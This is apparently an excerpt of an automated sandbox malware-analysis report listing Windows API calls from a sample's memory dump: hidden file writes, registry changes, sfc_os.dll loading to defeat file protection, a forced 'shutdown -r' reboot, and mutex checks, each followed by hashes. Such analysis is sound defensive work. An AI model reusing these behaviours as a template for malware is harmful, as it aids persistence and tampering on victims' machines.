                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,00408C5D,00000000,00000000,?,00407BCE,047E50D0,00408C5D,00408C5D,76AE8A60,00408C5D,?,00000000), ref: 00407B4F
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00407BCE,047E50D0,00408C5D,00408C5D,76AE8A60,00408C5D,?,00000000), ref: 00407B56
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(76AE8A60,00000007,?,00407BCE,047E50D0,00408C5D), ref: 00407B7F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$Attributes$CloseCreateHandleWrite
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 692393803-0
                                                                                                                                                                                                                                                      • Opcode ID: 61aed027ad1a965f9595f279dacd447d0498fcc999f5d6b0d6647d97e83e204e
                                                                                                                                                                                                                                                      • Instruction ID: 40671c2e2f84df2f62c6f4eb0101908bd37021d9e9d593671b63d8caa07d46a2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 61aed027ad1a965f9595f279dacd447d0498fcc999f5d6b0d6647d97e83e204e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13018E31905258BBEF215F649C49FDB3F68AF05364F004126FD00621D08274AE61DB66
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,76AE8A60,?,?,?,004108D0,?,00000000,?), ref: 004106A5
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000080,00000000,?,?,004108D0,?,00000000,?), ref: 004106B6
                                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,?,004108D0,?,00000000,?,?,004108D0,?,00000000,?), ref: 004106D1
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,004108D0,?,00000000,?), ref: 004106D8
                                                                                                                                                                                                                                                      • SetFileAttributesA.KERNEL32(00000000,00000002,?,?,004108D0,?,00000000,?), ref: 004106E3
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$Attributes$CloseCreateHandleWrite
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 692393803-0
                                                                                                                                                                                                                                                      • Opcode ID: a28542c8d8194dd271a427e1f27038af7f1ed474923027b7147f63bb0d485c30
                                                                                                                                                                                                                                                      • Instruction ID: 8754977078fc8a3942d47795b7f5e1f7d7f30a626694bd36d382f9fa2b757add
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a28542c8d8194dd271a427e1f27038af7f1ed474923027b7147f63bb0d485c30
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4501A471600208BBDB209FA5DC49FAF7F6CEB89770F504026FA0196191C6B09DA2DB64
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004079EF
                                                                                                                                                                                                                                                        • Part of subcall function 004140CA: SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?,76AE8A60,?,?,0041080C,00000026,?,?,00000000,?), ref: 004140DE
                                                                                                                                                                                                                                                        • Part of subcall function 004140CA: SHGetPathFromIDListA.SHELL32(?,?,?,?,0041080C,00000026,?,?,00000000,?), ref: 004140E8
                                                                                                                                                                                                                                                        • Part of subcall function 004140CA: SHGetMalloc.SHELL32(?), ref: 004140F2
                                                                                                                                                                                                                                                        • Part of subcall function 004140CA: lstrcatA.KERNEL32(?,0042A3B0,?,?,0041080C,00000026,?,?,00000000,?), ref: 00414113
                                                                                                                                                                                                                                                        • Part of subcall function 00407850: Sleep.KERNEL32(00000005,?,76AF0440,00000000), ref: 00407864
                                                                                                                                                                                                                                                        • Part of subcall function 00407850: wsprintfA.USER32 ref: 00407883
                                                                                                                                                                                                                                                        • Part of subcall function 00407850: FindFirstFileA.KERNEL32(?,?), ref: 00407896
                                                                                                                                                                                                                                                        • Part of subcall function 00407850: wsprintfA.USER32 ref: 004078D4
                                                                                                                                                                                                                                                        • Part of subcall function 00407850: FindNextFileA.KERNELBASE(00000000,00000010), ref: 0040798E
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,?,?,76AF0440), ref: 00407A46
                                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(?,Desktop,?,?,?,76AF0440), ref: 00407A84
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: FileFindwsprintf$CountFirstFolderFromListLocationMallocNextPathSleepSpecialTicklstrcatlstrcpylstrlen
                                                                                                                                                                                                                                                      • String ID: Desktop
                                                                                                                                                                                                                                                      • API String ID: 1306859140-3336322104
                                                                                                                                                                                                                                                      • Opcode ID: ca510237f18f7b1aecf944856f38dc60a44756b65426155893608739f4359ab0
                                                                                                                                                                                                                                                      • Instruction ID: d758924f8f924a0cb4478b1c2a6b9e0f80ec40a8d7e309cd9d1a2c00b3c217ad
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ca510237f18f7b1aecf944856f38dc60a44756b65426155893608739f4359ab0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF31FC71E0C218AFEB10A764EC49BEB37A99B50305F4040BBE18466192DA7C6EC4CF5A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,76AF3520,00000000,00413BDE,?,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe), ref: 00413843
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 0041384D
                                                                                                                                                                                                                                                        • Part of subcall function 0041382B: CloseHandle.KERNEL32(00000000,?,?,?,?,0040D13D,C:\Users\user\AppData\Local\Temp\yrzsecpaticodwrc.exe,00000000), ref: 00413856
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,76AF0F00,76AE8A60,00000000,?,?,?,0040226A,?), ref: 0040132C
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: File$Create$CloseHandleSize
                                                                                                                                                                                                                                                      • String ID: j"@
                                                                                                                                                                                                                                                      • API String ID: 268543215-1802473556
                                                                                                                                                                                                                                                      • Opcode ID: 31f341f7955c10033c650f1ffd4a365dfc58f77a0973fcccc59c783bf6ed1d4e
                                                                                                                                                                                                                                                      • Instruction ID: b6309a742a4d43b631aa445d4cedeb094c90530624afe1bb7dca7932cb7cf88a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 31f341f7955c10033c650f1ffd4a365dfc58f77a0973fcccc59c783bf6ed1d4e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A21F3B6510300BFE7116FB1ED4599A3FA8EB06364F10053EF901A2170DB7C6595CB5C
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RegCreateKeyExA.KERNEL32(80000002,00000000,0040D819,00000000,C:\Users\user\AppData\Local\Temp\), ref: 00415EE9
                                                                                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(0040D819,00000000,?,?,00000000,00000004,?,00000004), ref: 00415F12
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(0040D819,?,?,00000000,00000004,?,00000004), ref: 00415F1B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00415EB6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseCreateValue
                                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                                      • API String ID: 1818849710-787714339
                                                                                                                                                                                                                                                      • Opcode ID: 40e6c71a992a7c2e8f09d534d622b9993dff3e98155a1071289031704242a58b
                                                                                                                                                                                                                                                      • Instruction ID: d33b6102d000e128b126aea15ab64def901b4170a75cf8a89fc65d3170fde99c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40e6c71a992a7c2e8f09d534d622b9993dff3e98155a1071289031704242a58b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DF036B1941238BADB109B919C4AFEF7F7CEF05755F504075BA04E1051DA705B48C7A5
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000100), ref: 00413D20
                                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(sfc_os.dll), ref: 00413D2B
                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000005), ref: 00413D34
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AddressByteCharLibraryLoadMultiProcWide
                                                                                                                                                                                                                                                      • String ID: sfc_os.dll
                                                                                                                                                                                                                                                      • API String ID: 333878435-2681931132
                                                                                                                                                                                                                                                      • Opcode ID: 3c36bd2c1550f0672266681a64d7f472ae4e6c1e8223920922018f43c4b72a64
                                                                                                                                                                                                                                                      • Instruction ID: b7e4b594249faae0cedef0215e17f547bd7fa22e2a5bf3066866e522bee7e195
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c36bd2c1550f0672266681a64d7f472ae4e6c1e8223920922018f43c4b72a64
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B0E04F317443147BFB205FA0EC4EFA6362CAB04B61F640354BB35E40D0EEF495998B6A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(00000043), ref: 0040D4AB
                                                                                                                                                                                                                                                        • Part of subcall function 00413DD8: ExitWindowsEx.USER32(00000006,00050005), ref: 00413DED
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000001F4), ref: 0040D4C5
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(shutdown -r), ref: 0040D4D8
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Sleep$CallbackDispatcherExitUserWindows
                                                                                                                                                                                                                                                      • String ID: shutdown -r
                                                                                                                                                                                                                                                      • API String ID: 2129780474-3966090723
                                                                                                                                                                                                                                                      • Opcode ID: d65347461eb1159606083e011ae0f0cf97533425740c30ccdfe41762bb4e863b
                                                                                                                                                                                                                                                      • Instruction ID: d656d09b155cd6634d9f5f8501bfea0dcfe2fee2f2a7f8f05d117fa0df0b0c8d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d65347461eb1159606083e011ae0f0cf97533425740c30ccdfe41762bb4e863b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72D0C730B842219BD5203FE15D0775D39646F10715F81007FAD457A1D1CEBDA6619A6F
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,00000000,00000000,00020019,00000000), ref: 00415CA3
                                                                                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(00000000,00000000,?,?,00000000,?,00000001,?), ref: 00415CD9
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,?,00000000,?,00000001,?), ref: 00415CE6
                                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000,?,?,00000000,?,00000001,?), ref: 00415CEE
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Close$OpenQueryValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1607946009-0
                                                                                                                                                                                                                                                      • Opcode ID: a491de724d99324340aeb177c98d6297e6913b01a10ba44178b77f50eafc96a5
                                                                                                                                                                                                                                                      • Instruction ID: 351be250b04c206962fd1380f2a074eff5c3e03c83a55a2369d373208c135491
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a491de724d99324340aeb177c98d6297e6913b01a10ba44178b77f50eafc96a5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 43115EB1A00218FFEB119FA0DC46FEEBBBCAB04705F50047AA505E5082EB749A449B69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00413663: lstrlenA.KERNEL32(4941262305804196,?,?,00000000), ref: 00413691
                                                                                                                                                                                                                                                      • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 0040C591
                                                                                                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000001,00000000), ref: 0040C5A7
                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0040C5AF
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040C5BA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Mutex$CloseCreateErrorHandleLastOpenlstrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 592644537-0
                                                                                                                                                                                                                                                      • Opcode ID: 000a1266c8250fe00c398a31faa2c87a8f7fc2f543a9cf41a7e6eb80620c8649
                                                                                                                                                                                                                                                      • Instruction ID: c80b6dc3ec81cb7e527f81272f8b9e0629b83a31c53efe65eae3f0c2fc373074
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 000a1266c8250fe00c398a31faa2c87a8f7fc2f543a9cf41a7e6eb80620c8649
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4001DB36500224BBDB325B64DC45FE63BACAB08750F0001B7FA45E61C1DAB49B898EA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
